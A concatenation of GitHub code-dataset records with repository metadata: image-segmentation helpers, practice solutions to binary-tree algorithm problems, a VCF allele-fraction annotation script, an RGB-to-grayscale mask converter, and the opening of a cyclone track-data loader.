visualize_segmentations(img, anns):\n '''Visualize a set of segmentations (ground truth or predicted) on an image.\n '''\n vis_img = img.copy()\n \n colours = [[0, 235, 235], [0, 210, 0], [0, 0, 255], [255, 0, 255]]\n for i in range(4):\n mask = anns[:, :, i]\n if np.any(mask):\n print(f'Class {i}')\n kernel = np.ones((10, 10), np.uint8) \n dilated_mask = cv2.dilate(mask, kernel, iterations=1)\n contour_mask = dilated_mask - mask\n for c in range(3):\n vis_img[contour_mask == 1, c] = colours[i][c]\n return vis_img\n\n\ndef onehottify(x, n=None, dtype=float):\n '''1-hot encode x with the max value n (computed from data if n is None).\n '''\n x = np.asarray(x)\n n = np.max(x) + 1 if n is None else n\n return np.eye(n, dtype=dtype)[x]\n\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False, hide_threshold=None):\n \"\"\"pretty print for confusion matrixes\"\"\"\n columnwidth = max([len(x) for x in labels] + [5]) # 5 is value length\n empty_cell = \" \" * columnwidth\n # Print header\n print(\" \" + empty_cell, end=\" \")\n for label in labels:\n print(\"%{0}s\".format(columnwidth) % label, end=\" \")\n print()\n # Print rows\n for i, label1 in enumerate(labels):\n print(\" %{0}s\".format(columnwidth) % label1, end=\" \")\n for j in range(len(labels)):\n cell = \"%{0}.2f\".format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n print(cell, end=\" \")\n print()\n","repo_name":"RyanJDick/steel_seg","sub_path":"steel_seg/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"25609395387","text":"from utils import input_BinaryTreeNode_int32\nfrom utils import BinaryTreeNode\nfrom typing import List\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = 
None\n\"\"\"\n\ndef run(data,func,**args):\n root = input_BinaryTreeNode_int32(data[\"root\"])\n print(func(root,**args))\n#-------------------Problem-1--------------------------------------------------\n'''\n102. Binary Tree Level Order Traversal\n\n'''\ndef level_order_traversal(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n list_list_int32\n \"\"\"\n '''\n Time Complexity - O(n)\n Space Complexity - Worst Case O(n/2) ~O(n) - Number of nodes in the leaf level\n We know around 50% of nodes are in the last level\n '''\n result = []\n if root is None:\n return result\n queue = [root]\n while queue:\n numnodes = len(queue)\n temp = []\n for i in range(0,numnodes):\n node = queue.pop(0)\n temp.append(node.value)\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n result.append(temp)\n return result\n\n#----------------------------------Problem-2-----------------------------------------------------\n'''\n429. N-ary Tree Level Order Traversal\n'''\n\n\"\"\"\nFor your reference:\nclass TreeNode:\n def __init__(self, value):\n self.value = value\n self.children = []\n\"\"\"\ndef level_order(root):\n \"\"\"\n Args:\n root(TreeNode_int32)\n Returns:\n list_list_int32\n \"\"\"\n # Write your code here.\n result = []\n if root is None:\n return result\n queue = [root]\n result = []\n while queue:\n numnode = len(queue)\n temp = []\n for i in range(0,numnode):\n node = queue.pop(0)\n temp.append(node.value)\n for child in node.children:\n queue.append(child)\n \n result.append(temp)\n return result\n\n\n#--------------------Problem-3------------------------------------------------------------\n'''\n199. Binary Tree Right Side View\n'''\n\ndef right_view(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n list_int32\n \"\"\"\n # Write your code here.\n result = []\n if result is None:\n return []\n queue = [root]\n while queue:\n numnodes = len(queue)\n for i in range(0,numnodes):\n node = queue.pop(0)\n temp = node.value\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n result.append(temp[-1])\n return result\n\n#---------------------------------Problem-3-----------------------------------------------\n\n'''\n107. Binary Tree Level Order Traversal II\n\nReverse Level Order Traversal\n'''\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef reverse_level_order_traversal(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n list_list_int32\n \"\"\"\n # Write your code here.\n result = []\n if root is None:\n return result\n queue = [root]\n result = []\n while queue:\n numnode = len(queue)\n temp = []\n for i in range(0,numnode):\n node = queue.pop(0)\n temp.append(node.value)\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n \n result.append(temp)\n #reverse the result\n return result[::-1]\n\n\n#---------------------------------Problem-4----------------------------------------------\n'''\n103. 
Binary Tree Zigzag Level Order Traversal\n'''\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef zigzag_level_order_traversal(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n list_list_int32\n \"\"\"\n # Write your code here.\n result = []\n if root is None:\n return result\n queue = [root]\n righttoleft=False\n while queue:\n numnode = len(queue)\n temp = []\n for i in range(0,numnode):\n node = queue.pop(0)\n temp.append(node.value)\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n if righttoleft:\n result.append(temp[::-1])\n else:\n result.append(temp)\n righttoleft = not righttoleft\n \n return result\n\n\n#---------------------------------Problem-5----------------------------------------------\n'''\n2415. Reverse Odd Levels of Binary Tree\n\n'''\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\ndef reverseOddLevels(root):\n\n if root is None:\n return None # fix: the function returns a tree, not a list\n \n result = []\n q = [root]\n i = 0 # level index; fix: it was reset inside the loop, so no level was ever reversed\n while q:\n q_len = len(q)\n temp = []\n for _ in range(q_len):\n node = q.pop(0)\n temp.append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n if i%2==0:\n result.extend(temp)\n else:\n result.extend(temp[::-1])\n i=i+1\n\n # rebuild the tree from the level-order list; LeetCode 2415 guarantees a perfect tree\n def insertLevelOrder(arr, i, n):\n root = None\n if i < n:\n root = TreeNode(arr[i]) \n root.left = insertLevelOrder(arr, 2 * i + 1, n)\n root.right = insertLevelOrder(arr, 2 * i + 2, n)\n\n return root\n root = None\n n = len(result)\n root = insertLevelOrder(result,0,n)\n return root\n\n#-------------------------Problem-5-----------------------------------------\n\n'''\n543. Diameter of Binary Tree\nDiameter of the Binary Tree\n'''\n\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef binary_tree_diameter(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n int32\n \"\"\"\n # Write your code here.\n if root is None:\n return 0\n global_diam = [0]\n \n def binary_tree_diameter_helper(node):\n #base case\n if node.left is None and node.right is None:\n return 0\n \n #recursive case\n my_diam = 0\n LH = 0\n if node.left:\n LH = binary_tree_diameter_helper(node.left)\n my_diam = my_diam + LH + 1\n if node.right:\n RH = binary_tree_diameter_helper(node.right)\n my_diam = my_diam + RH +1\n LH = max(LH,RH)\n global_diam[0] = max(my_diam,global_diam[0])\n return LH + 1\n \n binary_tree_diameter_helper(root)\n \n return global_diam[0]\n
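\n\n# Quick sanity check (added for illustration): in the three-node tree 2 <- 1 -> 3\n# the longest leaf-to-leaf path has two edges, so the diameter is 2.\nif __name__ == '__main__':\n _d = BinaryTreeNode(1)\n _d.left = BinaryTreeNode(2)\n _d.right = BinaryTreeNode(3)\n print(binary_tree_diameter(_d))\n\n#----------------------------Problem-6-------------------------------------\n'''\n113. 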
Path Sum II\nPrint all paths that sum to k\n'''\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n    def __init__(self, value):\n        self.value = value\n        self.left = None\n        self.right = None\n\"\"\"\ndef all_paths_sum_k(root, k):\n    \"\"\"\n    Args:\n     root(BinaryTreeNode_int32)\n     k(int32)\n    Returns:\n     list_list_int32\n    \"\"\"\n    '''\n    Worst Case Scenario is when it is a balanced binary tree, as in that case there \\\n    could be n/2 [number of leaf nodes] such paths, each of size log(n) [height]\n\n    Time Complexity - Leaf Node + Intermediate node\n                    O(nlog(n)) + Constant Work\n    Space Complexity - Input + Aux + Output\n                    O(log(n)) + O(nlog(n))\n    '''\n\n\n    result = []\n    slate = []\n    if root is None:\n        return result\n\n    def helper_all_path_sum_k(node,target,slate):\n        #base case\n        if node.left is None and node.right is None:\n            if target==node.value:\n                slate.append(node.value)\n                result.append(slate[:])\n                slate.pop()\n\n        #recursive case\n        if node.left:\n            slate.append(node.value)\n            helper_all_path_sum_k(node.left,target-node.value,slate)\n            # ensuring to pop in case there is no right node\n            slate.pop()\n        if node.right:\n            slate.append(node.value)\n            helper_all_path_sum_k(node.right,target-node.value,slate)\n            slate.pop()\n\n\n    helper_all_path_sum_k(root,k,slate)\n\n    if not result:\n        result.append([-1])\n    return result\n\n\n#---------------------------Problem-7-----------------------------------------\n\n'''\n112. Path Sum\nRoot To Leaf Path Sum Equal To K\n'''\n\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n    def __init__(self, value):\n        self.value = value\n        self.left = None\n        self.right = None\n\"\"\"\ndef path_sum(root, k):\n    \"\"\"\n    Args:\n     root(BinaryTreeNode_int32)\n     k(int32)\n    Returns:\n     bool\n    \"\"\"\n    '''\n    Time Complexity = No of nodes * Work done per node\n                    n * O(1) = O(n)\n    Space Complexity = Height of the binary tree = O(logn)\n    '''\n    result = [False]\n    if root is None:\n        return False\n    def helper_path_sum(node,target):\n        #base case\n        if node.left is None and node.right is None:\n            if target==node.value:\n                result[0] = True\n            return\n\n        #recursive case\n        if node.left is not None:\n            helper_path_sum(node.left,target-node.value)\n        if node.right is not None:\n            helper_path_sum(node.right,target-node.value)\n\n\n    helper_path_sum(root,k)\n    return result[0]\n\n\n#----------------------------Problem-----------------------------------\n\n'''\n250 count-univalue-subtrees/\nhttps://leetcode.com/problems/count-univalue-subtrees/\n'''\ndef count_unival(root):\n\n\n    global_cnt = [0]\n    def count_unival_helper(node):\n        # base case: a leaf is always a unival subtree\n        if node.left is None and node.right is None:\n            global_cnt[0] = global_cnt[0]+1\n            return True\n\n\n        #recursive case\n        unival = True\n        left = True\n        right = True\n        if node.left:\n            left = count_unival_helper(node.left)\n            if not left or node.val != node.left.val:\n                unival = False\n\n        if node.right:\n            right = count_unival_helper(node.right)\n            if not right or node.val!=node.right.val:\n                unival = False\n\n        if unival:\n            global_cnt[0] = global_cnt[0] +1\n\n        return unival\n\n    count_unival_helper(root)\n    return global_cnt[0]
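\n\n\n# --- Added illustrative sketch (not in the original file) ---\n# _LCNode mirrors the LeetCode-style node (val/left/right) that count_unival\n# expects; the class name is an assumption. Every leaf is a unival subtree,\n# so a 3-node tree whose values are all 5 contains 3 unival subtrees.\nclass _LCNode:\n    def __init__(self, val):\n        self.val = val\n        self.left = None\n        self.right = None\n\ndef _demo_count_unival():\n    root = _LCNode(5)\n    root.left, root.right = _LCNode(5), _LCNode(5)\n    assert count_unival(root) == 3\n\n\n#----------------------------Problem-8----------------------------------\n\n'''\nPreorder Traversal\n'''\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n    def __init__(self, value):\n        self.value = value\n        self.left = None\n        self.right = None\n\"\"\"\ndef preorder(root):\n    \"\"\"\n    Args:\n     root(BinaryTreeNode_int32)\n    Returns:\n     list_int32\n    \"\"\"\n    # Write your code here.\n\n    result = []\n    if root is None:\n        return result\n    def 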
preorder_helper(node):\n        if node.left is None and node.right is None:\n            result.append(node.value)\n            return\n        #recursive case\n        isnode = False\n        if node.left is not None:\n            result.append(node.value)\n            isnode = not isnode\n            preorder_helper(node.left)\n        if node.right is not None:\n            if not isnode:\n                #if node.value not in result:\n                result.append(node.value)\n            preorder_helper(node.right)\n\n\n    preorder_helper(root)\n    return result\n\n#----------------------------Problem-8.1----------------------------------\n\n'''\nPreorder Traversal-Optimised\n'''\n\ndef preorder(root):\n    \"\"\"\n    Args:\n     root(BinaryTreeNode_int32)\n    Returns:\n     list_int32\n    \"\"\"\n    # Write your code here.\n\n    result = []\n    if root is None:\n        return result\n    def preorder_helper(node):\n        #base case not needed here:\n        # if node.left is None and node.right is None:\n        #     result.append(node.value)\n        #     return\n        #recursive case\n        result.append(node.value)\n        if node.left is not None:\n            preorder_helper(node.left)\n        if node.right is not None:\n            preorder_helper(node.right)\n\n\n    preorder_helper(root)\n    return result\n\n#----------------------------Problem-9----------------------------------\n\n'''\nInorder Traversal\n'''\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n    def __init__(self, value):\n        self.value = value\n        self.left = None\n        self.right = None\n\"\"\"\ndef inorder(root):\n    \"\"\"\n    Args:\n     root(BinaryTreeNode_int32)\n    Returns:\n     list_int32\n    \"\"\"\n    # Write your code here.\n\n    result = []\n    if root is None:\n        return result\n    def inorder_helper(node):\n        #recursive case\n        if node.left is not None:\n            inorder_helper(node.left)\n        result.append(node.value)\n        if node.right is not None:\n            inorder_helper(node.right)\n\n\n    inorder_helper(root)\n    return result\n\n\n\n#----------------------------Problem-10----------------------------------\n\n'''\nPostorder Traversal\n'''\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n    def __init__(self, value):\n        self.value = value\n        self.left = None\n        self.right = None\n\"\"\"\ndef postorder(root):\n    \"\"\"\n    Args:\n     root(BinaryTreeNode_int32)\n    Returns:\n     list_int32\n    \"\"\"\n    # Write your code here.\n    result = []\n    if root is None:\n        return result\n    def postorder_helper(node):\n\n        if node.left is not None:\n            postorder_helper(node.left)\n        if node.right is not None:\n            postorder_helper(node.right)\n        result.append(node.value)\n\n\n    postorder_helper(root)\n    return result
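\n\n# --- Added illustrative sketch (not in the original file) ---\n# Reusing the _DemoNode stand-in defined above: on the tree 2 <- 1 -> 3 the\n# three DFS orders differ only in where the root is emitted:\n# preorder [1, 2, 3], inorder [2, 1, 3], postorder [2, 3, 1].\ndef _demo_traversals():\n    root = _DemoNode(1)\n    root.left, root.right = _DemoNode(2), _DemoNode(3)\n    assert preorder(root) == [1, 2, 3]\n    assert inorder(root) == [2, 1, 3]\n    assert postorder(root) == [2, 3, 1]\n\n\n#-----------------------------Problem-11-------------------------------------\n'''\n108. 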
Convert Sorted Array to Binary Search Tree\n'''\n\ndef sorted_list_to_bst(head):\n \"\"\"\n Args:\n head(LinkedListNode_int32)\n Returns:\n BinaryTreeNode_int32\n \"\"\"\n # Write your code here.\n \n if head is None:\n return None\n arr = head\n def sorted_list_to_bst_helper(arr,start,end):\n #base case\n if start > end: #no node left\n return None\n \n #recursive case\n mid = start + (end-start)//2\n newnode = BinaryTreeNode(arr[mid])\n newnode.left = sorted_list_to_bst_helper(arr,start,mid-1)\n newnode.right = sorted_list_to_bst_helper(arr,mid+1,end)\n \n return newnode\n \n res = sorted_list_to_bst_helper(arr,0,len(arr)-1)\n \n return res\n\nsorted_list = {\n\"head\": [-1, 2, 3, 5, 6, 7, 10]\n}\n#print(sorted_list_to_bst(sorted_list[\"head\"]))\n\n\n#------------------------------------Problem-12------------------------------\n'''\nConstruct A Binary Search Tree From Its Preorder Traversal\n'''\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef build_binary_search_tree(preorder):\n \"\"\"\n Args:\n preorder(list_int32)\n Returns:\n BinaryTreeNode_int32\n \"\"\"\n # Write your code here.\n \n if not preorder:\n return None\n inorder = sorted(preorder)\n hashmap = {value:idx for idx,value in enumerate(inorder)}\n def build_binary_search_tree_helper(p,i,startp,endp,starti,endi):\n if starti>endi:\n return None\n \n #recursive case\n #find mid\n newnode = BinaryTreeNode(p[startp])\n midi = hashmap[p[startp]]\n num_left = midi -starti\n numright = endi - midi\n \n newnode.left = build_binary_search_tree_helper(p,i,startp+1,startp+num_left,starti,midi-1)\n newnode.right = build_binary_search_tree_helper(p,i,startp+1+num_left,endp,midi+1,endi)\n \n return newnode\n \n \n res = build_binary_search_tree_helper(preorder,inorder,0,len(preorder)-1,0,len(inorder)-1)\n return res\n \n'''\nTime Complexity - Leaf + intermediate \n Constnt + O(n)\nSpace Complexity - Input + Aux + Output\n O(n) + O(n) or O(logn) + O(n)\n'''\n\n\n#-------------------------------Problem-13------------------------------------ Not resolved\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef check_if_symmetric(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n bool\n \"\"\"\n # Write your code here.\n \n #Approch -1 Using Level Order Traversal\n \n if root is None:\n return True\n result = True\n q = [root]\n while q:\n len_q = len(q)\n slate = []\n for i in range(0,len_q):\n newnode = q.pop(0)\n slate.append(newnode.value)\n if newnode.left is not None:\n q.append(newnode.left)\n else:\n slate.append(-1)\n if newnode.right is not None:\n q.append(newnode.right)\n else:\n slate.append(-1)\n \n #check pallindrome\n if slate != slate[::-1]:\n result = False\n break\n return result\n\n\n#------------------------Problem-14----------------------------------------\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef lca(root, a, b):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n a(BinaryTreeNode_int32)\n b(BinaryTreeNode_int32)\n Returns:\n int32\n \"\"\"\n # Write your code here.\n globalfound = []\n def dfs(node):\n afound , bfound = False,False\n #base case\n if node.left is None and node.right is None:\n if node.value == a:\n afound = True\n if node.value == b:\n bfound = True\n if afound and bfound and not 
globalfound:\n globalfound.append(node.value)\n return (afound,bfound)\n \n #recursive case\n\n if node.value == a:\n afound = True\n if node.value == b:\n bfound = True\n \n if node.left:\n p,q = dfs(node.left)\n afound = afound or p\n bfound = bfound or q\n if node.right:\n p,q = dfs(node.right)\n bfound = bfound or q\n afound = afound or p\n \n if afound and bfound and not globalfound:\n globalfound.append(node.value)\n \n return afound , bfound\n \n dfs(root)\n if globalfound:\n return globalfound[0]\n return 0\n\n# data ={\n# \"root\": [1, None,\n# 3, 2, 5, None,\n# None, None, 4]\n# }\n# run(data,lca,2,1)\n\n#----------------------------Problem-15--------------------------------\n'''\n559. Maximum Depth of N-ary Tree\n'''\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution:\n def maxDepth(root) -> int:\n\n globalsol = []\n def dfs(node):\n if node is None :\n return 0\n \n #recursive case\n lr =rr = 0\n for child in node.children:\n lr = dfs(child)\n if lr > rr:\n rr = lr\n if globalsol:\n globalsol[0]= max(globalsol[0],rr+1) \n else:\n globalsol.append(rr+1)\n return rr +1\n \n res = dfs(root)\n \n return res\n\n#----------------------------Problem--------------------------------\n'''\n104. Maximum Depth of Binary Tree\n'''\n\ndef maxDepth(root):\n \n if root is None:\n return 0\n \n def max_depth_helper(node):\n if node.left is None and node.right is None:\n return 1\n \n # recursive case\n lh = rh = 0\n if node.left:\n lh = max_depth_helper(node.left)\n \n if node.right:\n rh = max_depth_helper(node.right)\n \n #return solution\n return max(lh,rh)+1\n \n res = max_depth_helper(root)\n \n if not res:\n return 0\n return res\n \n\n#----------------------------Problem-16--------------------------------\n'''\n230. 
Kth Smallest Element in a BST\n\n'''\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n    def __init__(self, value):\n        self.value = value\n        self.left = None\n        self.right = None\n\"\"\"\ndef kth_smallest_element(root, k):\n    \"\"\"\n    Args:\n     root(BinaryTreeNode_int32)\n     k(int32)\n    Returns:\n     int32\n    \"\"\"\n    # Write your code here.\n\n    if root is None:\n        return 0\n    globalk = [k]\n    result = []\n    def dfs(node):\n\n        # in-order walk: visit the left subtree, count this node, then the right subtree\n        if node.left:\n            dfs(node.left)\n\n        globalk[0] = globalk[0] -1\n        if globalk[0]==0:\n            result.append(node.value)\n        if node.right:\n            dfs(node.right)\n\n    dfs(root)\n    if result:\n        return result[0]\n    return 0\n\n\ndata ={\n\"root\": [5,3,6,2,4,None,None,1]\n}\nrun(data,kth_smallest_element,k=3)","repo_name":"u6yuvi/Algorithms","sub_path":"courses/algorithms/trees/problems.py","file_name":"problems.py","file_ext":"py","file_size_in_byte":21899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40717648665","text":"\nimport argparse\nfrom cyvcf2 import VCF, Writer\n\nparser=argparse.ArgumentParser(description=\"Adds corrected allele-fraction (C_AF) and total-depth (C_TDP) INFO fields to a VCF\")\nparser.add_argument('-VcfFile','--VcfFile', help=\"Vcf file with path\", required=True)\nargs=parser.parse_args()\n\nVcfFile=args.VcfFile\n\nvcf = VCF(VcfFile)\n\n\nvcf.add_info_to_header({'ID':'C_AF', 'Description':'Alternate allele fraction','Type':'Float', 'Number':'1'})\nvcf.add_info_to_header({'ID':'C_TDP', 'Description':'Total depth, reference and variant alleles together','Type':'Float', 'Number':'1'})\n\nfname=VcfFile\nfname=fname[:-4]+\"corrected.vcf\"\nw = Writer(fname, vcf)\n\nfor variant in vcf:\n    RefDP=variant.INFO.get('AC')[0]\n    VDP=variant.INFO.get('AC')[1]\n    variant.INFO['C_AF']=str(VDP/(RefDP+VDP))\n    variant.INFO['C_TDP']=str(RefDP+VDP)\n    w.write_record(variant)\n\nw.close(); vcf.close()
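\n\n# Worked example of the arithmetic above (illustrative numbers only): if a\n# site has AC = (18, 6) -- 18 reference-supporting and 6 variant-supporting\n# observations -- then C_TDP = 18 + 6 = 24 and C_AF = 6 / 24 = 0.25.\n","repo_name":"JIBINJOHNV/NanoporeVariantCalling","sub_path":"AmpliconSeqencing/SupportingScripts/longshot_add_DP_AF_Info_tovcf.py","file_name":"longshot_add_DP_AF_Info_tovcf.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4784281495","text":"import matplotlib as mpl\nimport numpy as np\n\nmpl.rcParams[\"figure.dpi\"] = 300\n\n\nimport tifffile\nfrom scipy.ndimage import label\n\n\ndef rgb2gray(mask_rgb, debug=False):\n    \"\"\"\n    # RGB to Grayscale\n    ## Code logic:\n    - Essentially, read in a mask-only image (not a composite) and figure out unique tuples that represent singular RGB values.\n    - A typical RGB value used to produce a color can be broken up into (R, G, B) intensity values.\n    - Tuples are preferable over numpy arrays as they can be easily condensed into unique elements using a set and then\n    converted back into a list (they are hashable).\n    - After uniques are found, build a dictionary with values from 1 to the number of unique RGB values in the images.\n    These will become the grayscale int values that we then plot.\n    The resulting array should automatically upscale from 8-bit integer if needed (>256 unique elements).\n    - **This only works for mask images, NOT overlays!**\n\n    Parameters\n    ----------\n    mask_rgb : np.ndarray\n        rgb image.\n    debug : bool, optional\n        Enable debugging output. 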
The default is False.\n\n Returns\n -------\n result : np.ndarray\n Grayscale image.\n\n \"\"\"\n\n # Iterate over every row and column in the mask image and generate a list of RGB tuples\n # There are probably more efficient ways to do this with np.reshape/np.squeeze, but for readability this was used:\n # - if you are dealing with a larger image set, adjust as needed for a more efficient solution\n # Creating a set initially and having to check every time we add a new element for whether it is unique is inefficient\n\n tuple_list = list()\n for row in mask_rgb:\n for column in row:\n tuple_list.append(tuple(column))\n\n # Convert from list -> set -> list to only keep unique RGB values for lookup table\n # Benefit of the tuple shows here! Hashable in a set which a numpy array alone wouldn't be\n\n tuple_list = list(set(tuple_list))\n\n # Make a dictionary of RGB tuples to int index from 1 to length of unique RGB tuples\n # Add one to reserve 0 for (0,0,0) and update (0,0,0) at the end to be 0\n\n tuple_dict = {tuple_list[i]: i + 1 for i in range(len(tuple_list))}\n tuple_dict[(0, 0, 0)] = 0\n\n # Generate a numpy of colors and IDs.\n # - The colors array will be n x 3 depending on the number of unique RGB values\n # - The color_ids array will be n x 1 representing each of the new values for any given RGB value\n # - This creates effectively a lookup table for converting a list of RGB values to a grayscale int equivalent\n\n colors = np.array(list(tuple_dict.keys()))\n color_ids = np.array(list(tuple_dict.values()))\n\n # Always prefer 8bit int if we can get away with it for easier viewing in windows platforms.\n # - If there are more than 255 distinct values, then use np.uint32 as that is always positive\n # and guarantees compatibility with even transparency based RGB codes (#AARRGGBB)\n\n if len(tuple_dict) < 255:\n dtype = np.uint8\n else:\n dtype = np.uint32\n\n # Initialize output array as the shape of the original image (minus RGB channels) and set everything to 0 initially\n # Also auto update dtype to be uint8 if possible, otherwise uint32\n\n result = np.zeros((mask_rgb.shape[0], mask_rgb.shape[1]), dtype=dtype)\n\n # Finally, check color of individual pixels in original mask against the color lookup table.\n # If all 3 RGB values match, then the index and new label of that point are returned\n\n label, row, column = np.where((mask_rgb == colors[:, None, None, :]).all(axis=3))\n\n unique_colors = np.unique(colors, axis=0)\n\n # Index rows and columns to now be the color ID determined above\n # Length of each of these will be mask.shape[0]*mask.shape[1], and will be automatically reshaped to fit the result array\n\n result[row, column] = color_ids[label]\n\n return result\n","repo_name":"skalalab/cell-analysis-tools","sub_path":"cell_analysis_tools/image_processing/rgb2gray.py","file_name":"rgb2gray.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"29554401527","text":"get_ipython().magic('matplotlib inline')\n\nimport os\nfrom os.path import join as pjoin\nfrom matplotlib import pyplot as plt\nfrom datetime import datetime, timedelta\n\nfrom Utilities.metutils import convert\nfrom Utilities.interp3d import interp3d\nfrom Utilities.nctools import ncLoadFile, ncGetData\n\nimport numpy as np\nimport scipy.stats as stats\n\nimport pandas as pd\nimport statsmodels.api as sm\nimport statsmodels.nonparametric.api as smnp\nfrom six import string_types\n\nimport seaborn as 
sns\nsns.set_style(\"ticks\")\nsns.set_context(\"talk\")\nfrom seaborn.utils import _kde_support\n\ndef convertLatLon(strval):\n \"\"\"\n Convert a string representing lat/lon values from '140S to -14.0, etc.\n \n :param str strval: string containing the latitude or longitude.\n \n :returns: Latitude/longitude as a float value.\n \n \"\"\"\n hemi = strval[-1].upper()\n fval = float(strval[:-1]) / 10.\n if (hemi == 'S') | (hemi == 'W'): \n fval *= -1\n if (hemi == 'E') | (hemi == 'W'):\n fval = fval % 360\n return fval\n\nCOLNAMES = ['BASIN','Number', 'Datetime','TECHNUM', 'TECH','TAU', 'Latitude', 'Longitude', 'Windspeed','Pressure',\n 'Status', 'RAD', 'WINDCODE','RAD1', 'RAD2','RAD3', 'RAD4','Poci', 'Roci','rMax', 'GUSTS','EYE',\n 'SUBREGION','MAXSEAS', 'INITIALS','DIR', 'SPEED','STORMNAME', 'DEPTH','SEAS',\n 'SEASCODE','SEAS1', 'SEAS2','SEAS3', 'SEAS4'] \n\nCOLTYPES = ['|S2', 'i', datetime, 'i', '|S4', 'i', 'f', 'f', 'f', 'f', \n '|S4', 'f', '|S3', 'f', 'f', 'f', 'f', 'f', 'f', 'f', 'f', 'f',\n '|S1', 'f', '|S3', 'f', 'f', '|S10', '|S1', 'f', \n '|S3', 'f', 'f', 'f', 'f']\nCOLUNITS = ['', '', '', '', '', '', '', '', 'kts', 'hPa', \n '', 'nm', '', 'nm', 'nm', 'nm', 'nm', 'hPa', 'nm', 'nm', 'kts', 'nm',\n '', '', '', 'degrees', 'kts', '', '', '',\n '', '', '', '', '']\nDATEFORMAT = \"%Y%m%d%H\"\ndtype = np.dtype({'names':COLNAMES, 'formats':COLTYPES})\nconverters = {\n 1: lambda s: s.strip(' ,'),\n 2: lambda s: datetime.strptime(s.strip(' ,'), DATEFORMAT),\n 6: lambda s: float(convertLatLon(s.strip(' ,'))),\n 7: lambda s: float(convertLatLon(s.strip(' ,'))),\n 8: lambda s: s.strip(' ,'),\n 9: lambda s: s.strip(' ,'),\n 10: lambda s: s.strip(' ,'),\n 11: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[11], 'km'),\n 12: lambda s: s.strip(' ,'),\n 13: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[13], 'km'),\n 14: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[14], 'km'),\n 15: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[15], 'km'),\n 16: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[16], 'km'),\n 17: lambda s: float(s.strip(',')),\n 18: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[18], 'km'),\n 19: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[19], 'km'),\n}\ndelimiter = (3,4,12,4,6,5,7,7,5,6,4,5,5,6,6,6,6,6,6,5,5,5,5)\nskip_header = 0\nusecols = tuple(range(23))\nmissing_value = \"\"\nfilling_values = 0\n\ndef loadData(filename):\n try:\n data = np.genfromtxt(filename, dtype, delimiter=delimiter, skip_header=skip_header, \n converters=converters, missing_values=missing_value, \n filling_values=filling_values, usecols=usecols, autostrip=True, invalid_raise=False)\n except IndexError:\n try:\n data = np.genfromtxt(filename, dtype, delimiter=delimiter, skip_header=skip_header, \n converters=converters, missing_values=missing_value, \n filling_values=filling_values, usecols=tuple(range(18)), autostrip=True, invalid_raise=False)\n except IndexError:\n data = np.genfromtxt(filename, dtype, delimiter=[3,4,12,4,6,5,7,7,5], skip_header=skip_header, \n converters=converters, missing_values=missing_value, \n filling_values=filling_values, usecols=tuple(range(9)), autostrip=True, invalid_raise=False)\n return data\n\ndef filterData(data):\n datetimes, idx = np.unique(data['Datetime'], True)\n filter1 = (data['Status'][idx] == 'TS') | (data['Status'][idx] == 'TY')\n filter2 = (data['Longitude'][idx] >= 90.) 
